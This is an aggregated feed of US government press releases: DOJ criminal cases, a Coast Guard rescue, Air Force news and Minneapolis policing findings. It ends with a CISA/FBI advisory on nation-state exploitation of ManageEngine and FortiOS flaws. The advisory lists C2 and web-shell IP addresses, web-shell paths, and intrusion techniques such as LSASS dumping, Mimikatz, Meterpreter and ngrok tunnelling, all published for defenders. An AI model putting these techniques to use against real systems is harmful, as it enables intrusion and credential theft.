Category: Security

Category Added in a WPeMatico Campaign

Posted on

Former White House Advisor Convicted of Contempt of Congress

Source: United States Department of Justice

            WASHINGTON – Former White House advisor Peter K. Navarro, 72, of Washington, D.C., was found guilty today by a U.S. District Court jury of two counts of contempt of Congress stemming from his failure to comply with a subpoena issued by the United States House Select Committee to Investigate the January 6th Attack on the United States Capitol.

            The announcement was made by U.S. Attorney Matthew M. Graves of the District of Columbia and Assistant Director in Charge David Sundberg, of the FBI’s Washington Field Office. A sentencing hearing is scheduled for Jan. 12, 2024.

            According to evidence presented at trial, on Feb. 9, 2022, the Select Committee issued a subpoena to Navarro. The subpoena required him to appear and produce documents to the Select Committee on Feb. 23, 2022, and to appear for a deposition before the Select Committee on March 2, 2022. Navarro refused to appear to give testimony as required by subpoena and refused to produce documents in compliance with a subpoena.

            In its subpoena, the Select Committee said it had reason to believe that Navarro had information relevant to its investigation. Navarro, formerly an advisor to the President on various trade and manufacturing policies, has been a private citizen since departing the White House on Jan. 20, 2021. He was indicted June 2, 2022.

            Each count of contempt of Congress carries a minimum of 30 days and a maximum of one year in jail, as well as a fine of up to $100,000. A federal district court judge will determine any sentence after considering the U.S. Sentencing Guidelines and other statutory factors.

            The case is being investigated by the FBI’s Washington Field Office. It is being prosecuted by the Fraud, Public Corruption, and Civil Rights Section of the U.S. Attorney’s Office for the District of Columbia. It was tried by Assistant United States Attorneys Elizabeth Aloi and John Crabb Jr., supported by Paralegal Specialist Sonalika Chaturvedi.

Posted on

Coast Guard rescues 1 from base of cliff near Erie, Pennsylvania

Source: United States Coast Guard

U.S. Coast Guard sent this bulletin at 09/06/2023 09:45 AM EDT

 

News Release  

U.S. Coast Guard 9th District Great Lakes
Contact: 9th District Public Affairs
Office: (216) 902-6020
After Hours: (216) 310-2608
9th District online newsroom

 

09/03/2023 09:48 PM EDT

DETROIT – The Coast Guard rescued one person from the base of a cliff Sunday, after their kayak capsized offshore near Shores Beach, Erie, Pennsylvania.

Posted on

District Man Indicted on Armed Carjacking and Other Charges in String of Armed Robberies at Convenience Stores and Gas Stations

Source: United States Department of Justice

            WASHINGTON – An 18-count indictment, filed today in the United States District Court for the District of Columbia, charges Shamell Naquan Joyner, 35, of the District of Columbia, with offenses arising out of an armed carjacking and six armed Hobbs Act robberies allegedly committed between April 12 and May 2, 2023. The indictment was announced by U.S. Attorney Matthew M. Graves, Special Agent in Charge Wayne Jacobs, of the FBI Washington Field Office’s Criminal and Cyber Division, and Acting Chief Pamela Smith, of the Metropolitan Police Department (MPD).

            According to the indictment, on April 12, 2023, Joyner committed an armed Hobbs Act robbery at the Falcon Fuel gas station and convenience store, located at 1301 13th Street Northwest, stealing money and personal property from the business and two employees while holding them at gunpoint. Joyner also is alleged to have discharged his firearm at two store employees during this robbery, neither of whom was wounded. (The government’s evidence connects this armed robbery to an April 17 armed robbery of an Alexandria, Virginia, 7-Eleven, in which Joyner is also alleged to have discharged his firearm. A store employee working at the time of the Alexandria robbery sustained a non–life threatening gunshot wound to his leg.)

            One day after the Falcon Fuel robbery, on April 13, Joyner is alleged to have carjacked a man at gunpoint in the Mount Vernon Triangle neighborhood. Joyner allegedly stole the man’s Honda HR-V and drove it across state lines into Virginia. The government’s evidence shows that Joyner used that car to commit subsequent armed robbery offenses, including an April 15, 2023, armed robbery of the 7-Eleven store at 1100 Vermont Avenue Northwest, in which an employee was held at gunpoint.

            On April 30, 2023, Joyner is alleged to have robbed the 7-Eleven store at 7401 Georgia Avenue Northwest and an employee, again at gunpoint. Joyner allegedly robbed another two stores at gunpoint the next day, including the 7‑Eleven store at 1325 2nd Street Northeast and the 721 Shop & Run and an employee at 721 H Street Northeast.

            Finally, on May 2, 2023, Joyner is alleged to have robbed the 7-Eleven store at 1645 Connecticut Avenue Northwest and an employee, also at gunpoint. Joyner then allegedly committed additional armed robberies in Maryland, including a 7-Eleven store in Montgomery County and an Exxon gas station and employee in Anne Arundel County. During the Exxon robbery, Joyner is alleged to have held the Exxon employee at gunpoint and robbed him of the keys to his Toyota RAV4, which Joyner then stole and drove across state lines into the District of Columbia. 

            Later that day, in the 400 block of Condon Terrace SE, the Metropolitan Police Department found Joyner in the stolen RAV4’s driver’s seat and arrested him without incident. At the time of his arrest, Joyner was in possession of the firearm used in the armed robberies committed between April 30 and May 2, as well as unique clothing and other evidence that tied him to numerous offenses.

            Joyner has been detained since his May 2, 2023, arrest.

            “These alleged crimes left numerous victims, store employees, and witnesses terrorized,” said U.S. Attorney Graves.  “Those who are driving these pattern and spree robberies in our community need to know that they will be caught and prosecuted to the fullest extent of the law.”

            The indictment charges Joyner with 18 counts: six counts of interference with commerce by robbery (also known as “Hobbs Act” robbery), which carries a maximum of 20 years in prison; one count of carjacking, which carries a maximum sentence of 15 years in prison; seven related counts of using, carrying, and possessing a firearm during and in relation to a crime of violence, which carries a mandatory minimum sentence of up to 10 years in prison and a maximum sentence of life in prison; two counts of interstate transportation of a stolen motor vehicle, which carries a maximum sentence of 10 years in prison; and two counts of unlawful possession of a firearm and/or ammunition, which carries a maximum sentence of 15 years in prison. Under the indictment, Joyner faces a mandatory minimum of 52 years in prison. The maximum potential sentences are prescribed by Congress and are provided here for informational purposes only, as any sentence imposed in this case will be determined by a federal district court judge after considering applicable sentencing guidelines and other statutory factors.

            This case is being investigated by the FBI’s Washington Field Office’s Violent Crime Task Force and the Metropolitan Police Department’s Carjacking Task Force. Valuable assistance was provided by the Bureau of Alcohol, Tobacco, Firearms and Explosives, and the Alexandria City, Anne Arundel County, Fairfax County, and Prince George’s County Police Departments. The case is being prosecuted by Assistant United States Attorneys Paul V. Courtney and Justin F. Song of the U.S. Attorney’s Office for the District of Columbia.

            The investigation into these offenses and potentially related armed robberies of commercial establishments located in the District of Columbia, Maryland, and Virginia remains ongoing.  Anyone with tips can call 1-800-CALL-FBI (800-225-5324) or visit tips.fbi.gov.

            An indictment is merely an allegation, and all defendants are presumed innocent until proven guilty beyond a reasonable doubt in a court of law.

Posted on

District Man Sentenced to 6 ½ Year Prison Term For Assaulting Homeless Man with a Tire Iron and Assaulting Elderly Tourist on the Metro  

Source: United States Department of Justice

Defendant Committed a String of Crimes in One Day

            WASHINGTON – Roscoe Rosborough, 32, of Washington, D.C., was sentenced today to 78 months in prison for two separate assaults that took place on the same day in Northeast and Northwest DC, in February of 2023, announced U.S. Attorney Matthew M. Graves, Special Agent in Charge Wayne A. Jacobs of the FBI Washington Field Office’s Criminal and Cyber Division, and Acting Chief Pamela A. Smith, of the Metropolitan Police Department.

            Rosborough pleaded guilty in June 9, 2023, in the Superior Court of the District of Columbia, to one count of assault with a dangerous weapon and one count of assault with significant bodily injury.

            According to the government’s evidence, on February 17, 2023, at approximately 4:55 a.m., the defendant entered a homeless shelter, though he was not a resident, and demanded to use the bathroom. After being refused, he continued into the shelter and ran into a resident walking to the cafeteria for breakfast. The defendant pulled out a tire iron from inside his clothing and struck the resident multiple times to the head, causing a laceration to the head that required nine staples.

            At approximately 3:30 p.m. that same day, the defendant was on a metro train headed for the Gallery Place – Chinatown station. He approached an elderly couple with their three minor grandchildren visiting from out of town. He got into their faces, unprovoked, and began yelling profanities at them. The 78-year-old grandfather put his hand on the defendant’s arm and said, “back off pal.” The defendant then assaulted the man, punching him, pulling him to the floor, and kicking him. This assault caused the victim to require multiple knee-drains and eventually surgery to his knee.

            In announcing the sentence, U.S. Attorney Graves, SAC Jacobs, and Acting Chief Smith commended the work of those who investigated the case from the Metropolitan Police Department, the Federal Bureau of Investigation, and the Department of Justice’s Civil Rights Division, specifically Special Agent Deborah Frye, Special Agent John Perren, and Trial Attorney Sanjay Patel. They also expressed appreciation for the work of those who assisted with the case at the U.S. Attorney’s Office, including Assistant U.S. Attorney Gauri Gopal and Victim/Witness Advocates Lakeisha McFall, Jennifer Clark, and Paola Molina.

            Finally, they commended the work of Assistant U.S. Attorneys Katie Sessa and Katrenia Shelly, who investigated and prosecuted the case.

Posted on

District Man Charged in a July 2023 killing at Marie Reed Recreation Center

Source: United States Department of Justice

Defendant allegedly shot the victim in the head during a recreational soccer match

            WASHINGTON – Pedro Funes, 33, of Washington, D.C., was charged in Superior Court today on a count of first degree murder while armed in the homicide of 30-year-old Around Solis on July 26, 2023, in the city’s Adams Morgan neighborhood, U.S. Attorney Matthew M. Graves and Acting Chief Pamela Smith of the Metropolitan Police Department announced.

            Funes was arraigned before Magistrate Judge Judith Pipe and entered a plea of not guilty. The court found probable cause to believe that Funes committed the slaying. The court held Funes without bond pending a preliminary hearing to be held on October 4, 2023, before Judge Robert Okun.

            An arrest on a complaint is merely a formally charged allegation that a defendant has committed a violation of criminal laws and every defendant is presumed innocent until, and unless, proven guilty.

            In announcing the charge, U.S. Attorney Graves commended the work of those investigating the case from the Metropolitan Police Department and the U.S. Attorney’s Office.

Posted on

After 5 years, Air Force Junior ROTC Flight Academy changing the face of aviation

Source: United States Air Force

MAXWELL AIR FORCE BASE, Ala. (AFNS) —  

The face of aviation is changing and it’s beginning to look a lot like high school students.

It’s been five years since the first group of cadets buckled up in cockpits in pursuit of an Air Force-sponsored private pilot certificate through the Air Force Junior Reserve Officers’ Training Corps Flight Academy program.

Since the summer of 2018, 1,089 AFJROTC cadets have pursued their dream of becoming a pilot, with 861, or 79%, succeeding. A significant achievement considering that outside of the program, the dropout rate for learner pilots is around 80%, according to research by aviation advocacy groups, such as Aircraft Owners and Pilots Association.

Headquarters AFJROTC first started taking Flight Academy scholarship applications in the fall of 2017, with the first aviation classes starting the following summer at six partnering universities. That number has since grown to 24 participating universities in 2023, which includes some of the nation’s leading flight programs like Embry-Riddle Aeronautical University and Purdue University.

The program was initially launched as part of the Air Force Aircrew Crisis Task Force with the stated goals of restoring the luster of aviation to high school students by increasing the pool of pilots for both the military and civilian aviation communities, each facing severe pilot shortages and increase diversity in the cockpit.

The AFJROTC Flight Academy accepted the challenge and the program has grown significantly since the initial class of 120 cadets took to the skies in 2018. The COVID-19 pandemic forced the cancellation of the program in 2020.

“All cadets are encouraged to apply for Flight Academy and to consider aviation as a profession,” said Ben Caro, Headquarters AFJROTC Program Development division chief. “It’s fantastic to see the diversity of the cadets interested in the program.”

In 2018, the percentage of underrepresented cadets participating in the Flight Academy was 41%. That number increased each year, with the years 2022 and 2023 each boasting 60% underrepresented groups. Of the 301 AFJROTC cadet participants in 2023, 40% were minorities and 37% female, with 239 receiving their pilot certificate.

“The Flight Academy has generated tremendous interest among our AFJROTC cadet corps with over 9,000 applicants expressing their desire to fly,” said Col. Johnny McGonigal, Headquarters AFJROTC director. “We believe this program meets the Air Force chief of staff’s desire to increase interest in aviation. It also provides an enduring solution for pilot production, while also impacting the diversity challenge facing both the military and civilian aviation communities.”

While the Air Force fully funds the extensive eight-week summer program, there is no requirement for graduates to pursue a military commitment. However, this program has inspired many cadets to take the next step toward becoming a military pilot. Of approximately 591 Flight Academy attendees who have also graduated high school by April 2023, 47% enrolled in the Air Force ROTC program in college to further their goal of becoming an Air Force pilot.

Even for those not pursuing a career in aviation, the academy was a very memorable and valuable experience.

“I highly recommend the flight academy to anyone who is considering it. It was one of the best experiences I have ever had and wouldn’t trade it for anything,” said 2nd Lt. Adam Landry, who completed the Flight Academy program at Delaware State University in 2019. “I made amazing connections and was grateful for the opportunity to learn how to fly. Thanks for the opportunity to attend the academy, I still think back on the memories quite often even though it was four years ago.”

Landry graduated from Syracuse University’s ROTC program in 2023 with a degree in civil engineering.

I’ve been extremely impressed with the Flight Academy cadets I’ve met and with the outstanding quality of the program overall.”

Brig. Gen. Houston Cantwell, Jeanne M. Holm Center for Officer Accessions and Citizen Development commander

“Our intent is to help regenerate interest and inspiration in our nation’s youth to pursue careers in aviation and to diversify the industry as a whole,” said Brig. Gen. Houston Cantwell, Jeanne M. Holm Center for Officer Accessions and Citizen Development commander. “With this program, we believe we are changing the face of aviation one cadet at a time.”

For more information about the AFJROTC Flight Academy Program, visit here.

Posted on

Assistant Attorney General Kristen Clarke Delivers Remarks on Justice Department Findings of Civil Rights Violations by the Minneapolis Police Department and the City of Minneapolis

Source: United States Department of Justice (2022)

Remarks as Delivered

Good morning. My name is Kristen Clarke. I’m the Assistant Attorney General for the Civil Rights Division at the U.S. Department of Justice. At the heart of many of the protests that unfolded in this city, and across the nation, was a call for constitutional, fair and non-discriminatory policing and respect for people’s civil rights.

Today we are here to take an important step toward answering that call and committing to the task of building out a core feature of American democracy – an effective, accountable police department that ensures respect for constitutional rights, garners public trust and keeps people safe.

I want to provide further details about the findings of our civil rights investigation that the Attorney General just announced.

First, we found that the Minneapolis Police Department uses excessive force – both deadly and less lethal.

We reviewed MPD’s 19 police shootings and one in-custody death from January 1, 2016, to August 16, 2022. Many of these incidents were unconstitutional uses of deadly force. We found that officers used deadly force without probable cause to believe that there was an immediate threat of serious physical harm to the officer or another person. In one example, an off-duty officer fired his gun at a car containing six people within three seconds of getting out of his squad car.

Neck restraints are lethal force. And we found that MPD officers often use neck restraints without warning, on people suspected of only minor offenses and on people who posed no threat.

We also reviewed less lethal uses of force – tasers, bodily force and pepper spray.

MPD officers’ use of tasers often is inconsistent with MPD’s own policy and occurs without warning. For example, officers sometimes use multiple, successive taser applications without re-assessing the need for further activations, which can be dangerous. They also use tasers for minor offenses, on kids and on people known to have behavioral health issues.

We found that MPD unconstitutionally uses bodily force and pepper spray against people who have committed minor offenses or no offense at all. In addition, we saw repeated instances of excessive force against kids without appropriate attempts to de-escalate the situation. In one instance, an MPD officer wearing street clothes drew his gun and pinned a teenager to the hood of a car for allegedly taking a $5 burrito without paying.

In addition, we found instances where MPD officers did not adequately ensure the safety of people in their custody. For example, after pepper spraying a group of people who were fighting, MPD officers ignored pleas to call an ambulance for one woman who needed help because she had asthma. Disregarding the medical distress of a person who is in custody or after a use of force is unlawful.

And, often, officers who could have intervened to stop the use of excessive force by their colleagues did not do so. This violates the Constitution.

Our second finding is that the Minneapolis Police Department unlawfully discriminates against Black people in its enforcement activities. This is a first-time finding for us – that the police department also discriminates against Native American people in its enforcement activities.

With our statistical experts, we reviewed over five years of MPD data, from November 1, 2016, to August 9, 2022, on roughly 187,000 traffic and pedestrian stops. We also conducted interviews and ride-alongs, and we reviewed other documents and information that the city provided.

As part of this systemic discrimination, we found that MPD disproportionately stops Black people and Native American people.

During stops involving Black and Native American people, MPD performs searches more frequently than during stops involving white people, even when they behave in similar ways.

MPD also uses force during stops involving Black and Native American people more frequently than they do during stops involving white people, even when they behave in similar ways. This too is another “first” – this is the first time we have made a finding that the police department unlawfully discriminates by using force after stops against Black and Native American people.

Starting in late May 2020 – when George Floyd was killed – MPD officers suddenly ceased reporting race and gender in many stops despite MPD policy requiring them to collect this data. We estimate that the percentage of daily stops with known race data recorded dropped over 35 percentage points during this period. Still, our analyses of the reported racial data from May 25, 2020, to August 9, 2022, showed significant racial disparities in searches and use of force.

Working with our statistical experts, we did not find that there was a legitimate, non-discriminatory reason for such different treatment for Black and Native American people during stops or the other enforcement activities that we examined.

We also found that the MPD violates people’s First Amendment rights by retaliating with force against people engaged in protests and engaged in demonstrations. We saw officers push and pepper spray protesters who posed no threat. Where protesters resisted police commands, officers used force to punish them well after any threat had ended. For example, during a protest in March of 2021, officers beat, kicked and shoved protestors even after they were restrained. One officer, used his full body weight, kneed a passive, restrained protester in the neck as he lay face down – an act that amounted to deadly force.

MPD retaliates against journalists and unlawfully restricts their access during protests. Under the First Amendment, the press must be allowed to safely gather and report the news.

In addition, we found that the police department retaliates against people who challenge or question them during stops and calls for service. The Constitution protects the right to criticize officers, even with profanity. We also found that MPD officers retaliate against people who observe and record them, even though they have a right to do so. All of this violates the law.

Our fourth and final finding is that MPD and the City of Minneapolis discriminate against people with behavioral health disabilities when responding to calls for assistance.

Many calls for service related to behavioral health do not require a law enforcement response. These calls often involve no violence, weapon or immediate threat. And in these circumstances, a law enforcement-led response can lead to trauma, injury and even death to people experiencing behavioral health issues. But these harms may be avoided by dispatching behavioral health responders where appropriate, and they can be mitigated by sending behavioral health responders with police where a law enforcement response may be needed.

To assess MPD’s and the city’s response to behavioral health calls, we analyzed a random sample of behavioral health-related 911 calls to which MPD responded. And we learned that MPD and the city often send the police unnecessarily and that people are harmed as a result. For the vast majority of the calls we reviewed, the person needing behavioral health attention was not reported to have a weapon or to pose an immediate threat. Only 0.45% of over 100,000 mental health calls resulted in an arrest at the scene – this underscores that the current reliance on police-only responses is unwarranted.

In December of 2021, the city launched a mobile crisis response pilot that provides a behavioral health response in addition to, or instead of, a police response. And that program is a step in the right direction, but that pilot effort lacks the capacity to promptly respond to calls throughout the city, and, as a result, MPD continues to be the primary response to behavioral health calls.

These findings are serious, and we enter the path to reform with a plan to put in place lasting and enduring changes that will ensure the constitutional, fair and non-discriminatory policing to which the people in this great city are entitled.

As I close, I want to extend my gratitude to the Mayor and the Police Chief for joining us today and for their collaboration. And I also want to extend deep appreciation to the people across Minneapolis who worked with us at every step of this process. Thanks to residents, community leaders, civil rights advocates, police officers and many others who used their voice in this process. An enormous and important task lies ahead, and we want this community to hear us clearly – we stand with you at every stage of this process that lays ahead.

I’ll turn the floor over to Ann Bildtsen, First Assistant U.S. Attorney for the District of Minnesota.

Posted on

USAFE-AFAFRICA demonstrates breakthrough mobile MQ-9A satellite launch, recovery package

Source: United States Air Force

MIROSLAWIEC, Poland (AFNS) —  

The U.S. Air Forces in Europe and Air Forces Africa achieved a significant technological proof of concept for the MQ-9A Reaper’s Satellite Launch and Recovery Package, or SLR-P, at the 12th Unmanned Aerial Vehicle Air Base in Mirosławiec.

While various iterations of the concept have surfaced in different contexts, the SLR-P offers a compact, “wallet-sized” innovation poised to launch and recover the MQ-9A at strategic theater locations situated in some of the most rugged, remote outposts in Europe. This marks a departure from conventional practices that necessitated returning to home stations for basic level maintenance.

“We live in a volatile, uncertain, complex and ambiguous world, which means it takes an innovative and motivated group of people – like what you see here – to influence change and propel us into the future,” said Maj. Philip West, USAFE-AFAFRICA project lead. “With this technology, we’re putting the ‘A’ in ‘ACE’ [Agile Combat Employment] for the MQ-9A.”

Tailored specifically for the European and African theaters, the SLR-P consists of a small, mobile container with an inventory list finely tuned to address the unique operational requirements and environmental nuances of each specific region. The container can be retrofitted with its own wheels to be towed or be carried by any means of available transportation and is designed to be highly mobile.

One of the most dramatic impacts of this concept is to reduce the “boots on the ground” needed to operate and maintain precision aircraft. Where traditional remotely piloted operations required teams of 30 to 150 personnel, the SLR-P can execute with a lean crew of just eight multi-capable Airmen.

This lean crew of multiple capable Airmen came from USAFE-AFAFRICA’s 435th Contingency Response Group.

“Empowering multi-capable Airmen is what we do every day,” said Col. Robert Rayner, 435th CRG commander. “The creation of the CRG 25 years ago aimed to extend airpower beyond our main bases. While our primary mission is supporting mobility operations, we’ve adapted our capabilities to respond to what the Air Force, and specifically what USAFE, needs.”

“Today, we’re launching and recovering MQ-9As, but tomorrow it could be F-16s, and the next day, C-17s. Whatever the requirement, the 435th CRG remains light, lean and lethal to support,” he added.

The SLR-P’s integration with satellite technology also ushers in a new era of connectivity and maintenance efficiency. This capability facilitates rapid power-up of the MQ-9A and seamless satellite link establishment, minimizing pre-mission preparations.

By simplifying maintenance functions, the SLR-P allows the maintenance team to focus solely on essential tasks, leading to reduced downtime and heightened mission readiness.

This successful proof of concept not only marks the emergence of a new era in remotely piloted operations, but it also highlights the steadfast dedication of both the U.S. and Poland to shared security goals and technological progress.

“Hosting this first-ever proof of concept underscores Poland’s commitment to protecting not only Polish sovereignty but also fulfilling its obligation as a pivotal member of the NATO alliance,” said Col. Marcin Szubiński, Polish Air Force’s 12th UAV Air Base commander. “We are proud to contribute to testing this capability, building on our five-year history of implementing cutting-edge ISR technologies within EU airspace by prioritizing interoperability with our NATO allies while refining procedures and capabilities as needed.”

This proof of concept notably commenced amidst challenging weather conditions. Under typical circumstances, the mission for the day might have been canceled; however, the weather in Poland proved to be favorable for testing the system’s resilience, prompting the team to make a pivotal choice – executing a weather diversion to this new field or returning the MQ-9A back to its home station.

Airmen stationed with the Pennsylvania Air National Guard undertook a task unprecedented at this airfield, achieving a milestone that holds immense significance. In the process, they officially designated this location as a future alternate launch site, particularly in periods of adverse weather.

Poland now stands as destination for America’s most powerful, capable aircraft, ready to serve as an alternate launch location during times of inclement weather. This development further emphasizes the adaptability and resilience that characterize this transformative proof of concept.

Posted on

Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475

Source: US Department of Homeland Security

SUMMARY

The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Cyber National Mission Force (CNMF) identified the presence of indicators of compromise (IOCs) at an Aeronautical Sector organization as early as January 2023. Analysts confirmed that nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966 to gain unauthorized access to a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move laterally through the network. This vulnerability allows for remote code execution on the ManageEngine application. Additional APT actors were also observed exploiting CVE-2022-42475 to establish presence on the organization’s firewall device.

CISA and co-sealers are releasing this joint Cybersecurity Advisory (CSA) to provide network defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation.

Download the PDF version of this report:

For a downloadable copy of IOCs, see:

For a downloadable copy of the Malware Analysis Report (MAR) accompanying this CSA, see:

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13. See Tables 3-13 for the APT actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding mitigation and/or detection recommendations.

Overview

By request of the impacted organization, CISA conducted an incident response engagement from February to April 2023. CISA and co-sealers assess that beginning as early as January 2023, multiple nation-state APT actors were present on the organization’s network via at least two initial access vectors:

  • Initial Access Vector 1: APT actors exploited CVE-2022-47966 to access the organization’s web server hosting the public-facing application, Zoho ManageEngine ServiceDesk Plus.
  • Initial Access Vector 2: APT actors exploited CVE-2022-42475 to access the organization’s firewall device.

CISA and co-sealers identified an array of threat actor activity, to include overlapping TTPs across multiple APT actors. Per the activity conducted, APT actors often scan internet-facing devices for vulnerabilities that can be easily exploited. Firewall, virtual private networks (VPNs), and other edge network infrastructure continue to be of interest to malicious cyber actors. When targeted, they can be leveraged to expand targeted network access, serve as malicious infrastructure, or a mixture of both.

APT Actor Activity

Initial Access Vector 1

As early as January 2023, APT actors exploited CVE-2022-47966 [T1190] for initial access to the organization’s web server hosting the public-facing application, Zoho ManageEngine ServiceDesk Plus. CISA observed indications in log files that a connection to the known malicious IP address 192.142.226[.]153 was made as part of initial exploitation.

Through exploitation of CVE-2022-47966, APT actors achieved root level access on the web server and created a local user account [T1136.001] named Azure with administrative privileges [T1068]. Actors were further able to download malware, enumerate the network, collect administrative user credentials, and move laterally through the organization’s network. CISA and co-sealers were unable to determine if proprietary information was accessed, altered, or exfiltrated. This was due to the organization not clearly defining where their data was centrally located and CISA having limited network sensor coverage.

Initial Access Vector 2

Additional APT actors exploited CVE-2022-42475 on the organization’s firewall device, which was indicated by multiple successful VPN connections from known-malicious IPs between February 1-16, 2023. It was identified that APT actors compromised and used disabled, legitimate administrative account credentials [T1078.003] from a previously hired contractor—of which the organization confirmed the user had been disabled prior to the observed activity.

Analysis identified that a common behavior for these threat actors was to use disabled administrative account credentials and delete logs from several critical servers in the environment [T1070.001]. This prevented the ability to detect follow-on exploitation or data exfiltration. CISA and co-sealers were also unable to further track the activity due to the organization not having Network Address Translation (NAT) IP logging enabled.

APT actors initiated multiple Transport Layer Security (TLS)-encrypted sessions [T1573.002] on Transmission Control Protocol (TCP) port 10443 [T1571], indicating successful exchanges of data transfer from the firewall device. APT actors were observed connecting to the device from the following actor-controlled C2 IP addresses:

  • 144.202.2[.]71
  • 207.246.105[.]240
  • 45.77.121[.]232
  • 47.90.240[.]218

APT actors further leveraged legitimate credentials to move from the firewall to a web server, where multiple web shells were loaded—among other locations, such as the OWA server—into the following directories. Note: The following file paths to these web shells were received in coordination with a trusted third-party; however, the artifacts were not received for analysis.

  • c:Program FilesMicrosoft Office Web AppsRootWebsiteen-usresource.aspx
  • c:inetpubwwwrootuninetcssfont-awesomecssdiscover.ashx
  • c:inetpubwwwrootuninetcssfont-awesomecssconfiglogin.ashx
  • c:Program FilesCommon FilesMicrosoft SharedWeb Server Extensions15templatelayoutsapproveinfo.aspx
  • c:Program FilesMicrosoft Office Web AppsRootWebsiteinfos.aspx
  • c:Program FilesMicrosoft Office Web AppsRootWebsiteerrorinfo.aspx
  • c:Program FilesMicrosoft Office Web AppsRootWebsiteinfos.ashx
  • c:Program FilesMicrosoft Office Web AppsRootWebsiteen-userror.aspx
  • c:Program FilesMicrosoft Office Web AppsRootWebsiteen-usinfos.aspx
  • c:Program FilesMicrosoft Office Web AppsRootWebsiteen-usinfo.aspx
  • c:Program FilesMicrosoft Office Web AppsRootWebsiteen-usinfo-1.aspx
  • c:Program FilesMicrosoft Office Web AppsRootWebsiteen-usnew_list.aspx
  • c:Program FilesMicrosoft Office Web AppsRootWebsiteen-userrorinfo.aspx
  • c:Program FilesMicrosoft Office Web AppsRootWebsiteen-uslgnbotr.ashx
  • c:inetpubpasswordchangeLECPNJYRH.aspx
  • c:inetpubpasswordchange9ehj.aspx
  • c:inetpubwwwrootwssVirtualDirectoriesPortal80_vti_pvtservicesinfo.ashx
  • c:inetpubwwwrootwssVirtualDirectoriesPortal80_vti_pvtservices.aspx
  • c:inetpubredirectedSites[REDACTED]productsuns1fw.aspx
  • c:inetpubredirectedSites[REDACTED]productsuns1ew.aspx

The following IP addresses were identified as associated with the loaded web shells:

  • 45.90.123[.]194
  • 154.6.91[.]26
  • 154.6.93[.]22
  • 154.6.93[.]5
  • 154.6.93[.]12
  • 154.6.93[.]32
  • 154.6.93[.]24
  • 184.170.241[.]27
  • 191.96.106[.]40
  • 102.129.145[.]232
Forensic Timeline of APT Actor Activity

Tables 1 and 2 list the timeline of events discovered during the incident response, as well as tools used by the APT actors to conduct their operations, respectively. All timestamps are presented in Coordinated Universal Time (UTC).

Table 1: Timeline of APT Actor Activity

Timestamp (UTC)

Event

Description

2023-01-18

11:57:02

Hello World User-Agent string observed in 44 total events.

Uniform Resource Identifier (URI): /cgi-bin/downloadFlile[.]cgi

Hello World, the User-Agent string inside of the initiated HTTP request, was observed during communication between the organization’s web server and malicious command and control (C2) server IP 92.118.39[.]82 [T1071.001]. This string has been observed in open source as an initial step of the Mirai botnet to download malicious artifacts [T1583.005].[1]

2023-01-20

Attempts made to export three files; associated with malicious IP 192.142.226[.]153.

APT actors attempted to export [TA0009], [TA0010] three files, which were analyzed and identified as Local Security Authority Subsystem Service (LSASS) dump files. These files were renamed with .zip and .gif extensions to evade detection [T1036.008]. Analysis confirmed the APT actors were unsuccessful at exfiltrating these files:

  • wo_view_bg.zip (09:06:37 UTC)
  • wo_view_bg1.gif (09:08:11 UTC)
  • wo_view_bg2.gif (09:19:43 UTC)

Note: If local administrative access is achieved on a victim host, dumping LSASS credentials may allow for lateral movement across the environment. This behavior was identified during the engagement and is detailed throughout Table 1.

2023-01-20

16:51:05

Successful web server exploitation via CVE-2022-47966.

Successful web server (Zoho ManageEngine ServiceDesk Plus) exploitation via CVE-2022-47966.

2023-01-21

06:46:42

Azure local user account with administrative permissions created.

A local user account with administrative permissions, named Azure, was created on the server hosting ServiceDesk Plus.

2023-01-21

06:49:40

LSASS dumped by Azure user.

The Azure user successfully accessed and dumped credentials stored in the process memory of LSASS for the Active Directory (AD) domain [T1003.001].

Note: Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

2023-01-21

06:50:59

Mimikatz.exe downloaded via ConnectWise ScreenConnect.

The legitimate ConnectWise ScreenConnect client was utilized to connect to the ServiceDesk system, download mimikatz.exe, and execute malicious payloads to steal credentials [T1219], [T1588.002].

Note: ConnectWise ScreenConnect was observed in multiple locations within the organization’s environment, but the organization confirmed that it was not authorized software. Analysis assessed APT actors downloaded the legitimate software for malicious, illegitimate use prior to the download of mimikatz.exe.

2023-01-21

07:34:32

Bitmap.exe malware downloaded and designated to connect to C2 IP 179.60.147[.]4.

Azure user account downloaded bitmap.exe to the ServiceDesk system to execute an obfuscated, embedded malicious payload from its C2 server [T1027.009]. This malware is identified as a variant of Metasploit (Meterpreter).

See MAR-10430311-1.v1 for additional details.

2023-01-21

08:46:23

Mimikatz credential dump files created.

Two files (c:windowssystem32fuu.txt, c:windowssystem32jojo.txt) were created as means for Mimikatz to dump/write credentials to disk on the ServiceDesk system [T1003].

2023-01-21

09:25:58

Legitimate files/applications nmap.exe and npcap.exe downloaded.

Azure user account downloaded nmap.exe [T1018] and npcap.exe [T1040] to continue network and credential information gathering efforts. Though legitimate applications, APT actors used these files for illegitimate, malicious purposes.

Note: Adversaries may gather information about the victim’s network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.

2023-01-21

13:56:14

ssh2.zip downloaded by the Azure user account.

APT actors downloaded the file ssh2.zip via the Azure user account, which contained legitimate files that could have been leveraged for malicious purposes. When unzipped, the following files were extracted:

  • install-sshd.ps1 (script)
  • psexec.exe
  • sshd.exe
  • ssh.exe
  • ssh-sk-helper.exe
  • libcrypto.dll

Note: CISA analyzed these files and did not identify the files as malicious. However, ssh.exe was downloaded to establish persistence on the ServiceDesk system via SSH [T1133] and is detailed in the scheduled task below.

2023-01-21

14:02:45

 Ngrok token created, renamed to ngrok.yml config file, and Remote Desktop Protocol (RDP) connection established.

Ngrok was used to establish an RDP connection [T1021.001]—another method of maintaining persistence on the ServiceDesk system. In this instance, Ngrok was used to establish a reverse proxy connection to the ServiceDesk system.

